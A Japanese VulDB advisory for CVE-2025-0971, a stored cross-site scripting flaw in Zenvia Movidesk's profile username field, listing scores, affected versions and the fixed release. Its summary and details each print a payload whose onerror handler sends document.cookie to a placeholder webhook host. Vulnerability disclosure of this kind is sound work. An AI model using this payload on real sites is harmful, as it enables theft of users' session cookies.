Zenvia Movidesk 迄 25.01.22 Profile Editing /Account/EditProfile ユーザー名 クロスサイトスクリプティング
要約
このたび、Zenvia Movidesk 迄 25.01.22において、問題があるに分類される脆弱性が見つかりました。 影響を受けるのは 不明な関数 ファイル/Account/EditProfileの コンポーネントProfile Editingのです。 引数 ユーザー名 への入力<img src="x" onerror="this.src='https://YOUR-WEBHOOK-URL?c=' + document.cookie;">の操作が、 クロスサイトスクリプティングをもたらします。
この脆弱性はCVE-2025-0971という名称で流通しています。 攻撃を遠隔で開始することができます。 さらに、入手できるエクスプロイトツールが存在します。
該当するコンポーネントのアップグレードを推奨します。
詳細
このたび、Zenvia Movidesk 迄 25.01.22において、問題があるに分類される脆弱性が見つかりました。 影響を受けるのは 不明な関数 ファイル/Account/EditProfileの コンポーネントProfile Editingのです。 引数 ユーザー名 への入力<img src="x" onerror="this.src='https://YOUR-WEBHOOK-URL?c=' + document.cookie;">の操作が、 クロスサイトスクリプティングをもたらします。 CWEによる問題の宣言は、CWE-79 につながります。 この弱点はに発表されました。
この脆弱性はCVE-2025-0971という名称で流通しています。 攻撃を遠隔で開始することができます。 テクニカルな情報があります。 この脆弱性の普及度は平均未満です。 さらに、入手できるエクスプロイトツールが存在します。 エクスプロイトが公に開示されており、悪用される可能性があります。 現在の時点で、エクスプロイトの価格はおおよそUSD $0-$5kかもしれません。 MITRE ATT&CKプロジェクトは攻撃技術をT1059.007としています。
概念実証 に指定されています。
バージョン25.01.22.245a473c54にアップグレードすることで、この問題に対処できます。 該当するコンポーネントのアップグレードを推奨します。
製品
ベンダー
名前
バージョン
- 25.01.0
- 25.01.1
- 25.01.2
- 25.01.3
- 25.01.4
- 25.01.5
- 25.01.6
- 25.01.7
- 25.01.8
- 25.01.9
- 25.01.10
- 25.01.11
- 25.01.12
- 25.01.13
- 25.01.14
- 25.01.15
- 25.01.16
- 25.01.17
- 25.01.18
- 25.01.19
- 25.01.20
- 25.01.21
- 25.01.22
CPE 2.3
CPE 2.2
CVSSv4
VulDB ベクトル: 🔍VulDB 信頼性: 🔍
CNA CVSS-B Score: 🔍
CNA CVSS-BT Score: 🔍
CNA ベクトル: 🔍
CVSSv3
VulDB ベースメタスコア: 4.1VulDB 一時的なメタスコア: 4.0
VulDB ベーススコア: 3.5
VulDB 一時的なスコア: 3.2
VulDB ベクトル: 🔍
VulDB 信頼性: 🔍
NVD ベーススコア: 5.4
NVD ベクトル: 🔍
CNA ベーススコア: 3.5
CNA ベクトル: 🔍
CVSSv2
| AV | AC | Au | C | I | A |
|---|---|---|---|---|---|
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| ベクトル | 複雑さ | 認証 | 機密性 | 完全性 | 可用性 |
|---|---|---|---|---|---|
| 解除 | 解除 | 解除 | 解除 | 解除 | 解除 |
| 解除 | 解除 | 解除 | 解除 | 解除 | 解除 |
| 解除 | 解除 | 解除 | 解除 | 解除 | 解除 |
VulDB ベーススコア: 🔍
VulDB 一時的なスコア: 🔍
VulDB 信頼性: 🔍
悪用
クラス: クロスサイトスクリプティングCWE: CWE-79 / CWE-94 / CWE-74
CAPEC: 🔍
ATT&CK: 🔍
物理的: いいえ
ローカル: いいえ
リモート: はい
可用性: 🔍
アクセス: パブリック
ステータス: 概念実証
EPSS Score: 🔍
EPSS Percentile: 🔍
価格予測: 🔍
現在の価格評価: 🔍
| 0-Day | 解除 | 解除 | 解除 | 解除 |
|---|---|---|---|---|
| 本日 | 解除 | 解除 | 解除 | 解除 |
脅威インテリジェンス
関心: 🔍アクティブアクター: 🔍
アクティブなAPTグループ: 🔍
対策
推奨: アップグレードステータス: 🔍
0day日時: 🔍
アップグレード: Movidesk 25.01.22.245a473c54
タイムライン
2025年02月02日 🔍2025年02月02日 🔍
2025年10月10日 🔍
ソース
ステータス: 確認済みCVE: CVE-2025-0971 (🔍)
GCVE (CVE): GCVE-0-2025-0971
GCVE (VulDB): GCVE-100-294362
scip Labs: https://www.scip.ch/en/?labs.20161013
エントリ
作成済み: 2025年02月02日 08:59更新済み: 2025年10月10日 19:18
変更: 2025年02月02日 08:59 (56), 2025年02月03日 01:22 (30), 2025年02月03日 13:08 (1), 2025年02月06日 08:32 (3), 2025年10月10日 19:18 (12)
完了: 🔍
提出者: y4g0
コミッター: y4g0
Cache ID: 216::103
提出
承諾済み
- 提出 #486023: zenvia movidesk 25.01.15.86c796efe6 Cross Site Scripting (〜によって y4g0)
If you want to get best quality of vulnerability data, you may have to visit VulDB.
コメントはまだありません。 言語: ja + en.
コメントするにはログインしてください。